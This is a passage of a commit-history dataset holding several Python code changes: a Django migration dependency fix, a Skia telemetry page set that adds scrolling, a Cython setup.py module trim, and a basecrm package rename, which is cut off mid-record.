('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| Add dependencies to contenttypes to the migration | Add dependencies to contenttypes to the migration
| Python | mit | vladimiroff/humble-media,vladimiroff/humble-media | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
Add dependencies to contenttypes to the migration | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| <commit_before># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
<commit_msg>Add dependencies to contenttypes to the migration<commit_after> | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
Add dependencies to contenttypes to the migration# encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
| <commit_before># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
<commit_msg>Add dependencies to contenttypes to the migration<commit_after># encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '__first__'),
('contenttypes', '__first__'),
]
operations = [
migrations.CreateModel(
name='Resource',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('title', models.CharField(max_length=64)),
('description', models.TextField()),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field='id')),
('file', models.FileField(upload_to='resources/')),
('min_price', models.PositiveIntegerField(default=1, blank=True)),
('is_published', models.BooleanField(default=False)),
('is_verified', models.BooleanField(default=True)),
],
options={
},
bases=(models.Model,),
),
]
|
430fd5393668249f01a2b941eef62569d758c6cf | tools/skp/page_sets/skia_intelwiki_desktop.py | tools/skp/page_sets/skia_intelwiki_desktop.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| Add scrolling to go to the more interesting parts of desk_intelwiki.skp | Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com>
| Python | bsd-3-clause | google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,aosp-mirror/platform_external_skia,google/skia,aosp-mirror/platform_external_skia,google/skia,google/skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,aosp-mirror/platform_external_skia | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com> | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| <commit_before># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
<commit_msg>Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com><commit_after> | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
| <commit_before># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(120)
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
<commit_msg>Add scrolling to go to the more interesting parts of desk_intelwiki.skp
Bug: skia:11804
Change-Id: I96ce34311b5e5420ee343a0dbc68ef20f399be4f
Reviewed-on: https://skia-review.googlesource.com/c/skia/+/390336
Commit-Queue: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Reviewed-by: Robert Phillips <95e8ac5504948c7bf91b22c16a8dbb7ae7c66bfd@google.com><commit_after># Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0401,W0614
from telemetry import story
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
class SkiaBuildbotDesktopPage(page_module.Page):
def __init__(self, url, page_set):
super(SkiaBuildbotDesktopPage, self).__init__(
url=url,
name=url,
page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
self.archive_data_file = 'data/skia_intelwiki_desktop.json'
def RunNavigateSteps(self, action_runner):
action_runner.Navigate(self.url)
action_runner.Wait(20)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class SkiaIntelwikiDesktopPageSet(story.StorySet):
""" Pages designed to represent the median, not highly optimized web """
def __init__(self):
super(SkiaIntelwikiDesktopPageSet, self).__init__(
archive_data_file='data/skia_intelwiki_desktop.json')
urls_list = [
# go/skia-skps-3-19
'https://en.wikipedia.org/wiki/Intel_Graphics_Technology',
]
for url in urls_list:
self.AddStory(SkiaBuildbotDesktopPage(url, self))
|
902e4500b57d54a80a586b0843ff3a68706a5c58 | setup.py | setup.py | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| Remove py modules causing GUI lag | Remove py modules causing GUI lag
| Python | mit | cropleyb/pentai,cropleyb/pentai,cropleyb/pentai | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
Remove py modules causing GUI lag | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| <commit_before>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
<commit_msg>Remove py modules causing GUI lag<commit_after> | """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| """
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
Remove py modules causing GUI lag"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
| <commit_before>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
<commit_msg>Remove py modules causing GUI lag<commit_after>"""
Distutils script for building cython .c and .so files. Call it with:
python setup.py build_ext --inplace
"""
from distutils.core import setup
from Cython.Build import cythonize
#from Cython.Compiler.Options import directive_defaults
#directive_defaults['profile'] = True
cy_modules = [
'board_strip.pyx',
'length_lookup_table.pyx',
]
if False:
cy_modules.extend([
'priority_filter.py',
'budget_searcher.py',
'utility_calculator.py',
'utility_stats.py',
'direction_strips.py',
'alpha_beta.py',
'ab_state.py',
'game_state.py',
'board.py',
'ai_player.py',
])
setup(
name = "Pentacular",
ext_modules = cythonize(
[
'board_strip.pyx',
'length_lookup_table.pyx',
],
# extra_compile_args=["-O3"], # Is this doing anything?
)
)
|
24773383448698c71c5e83810b767e3a7c0900fb | setup.py | setup.py | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| Update package name to basecrm | Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).
| Python | mit | yunojuno/django-basecrm | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages). | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
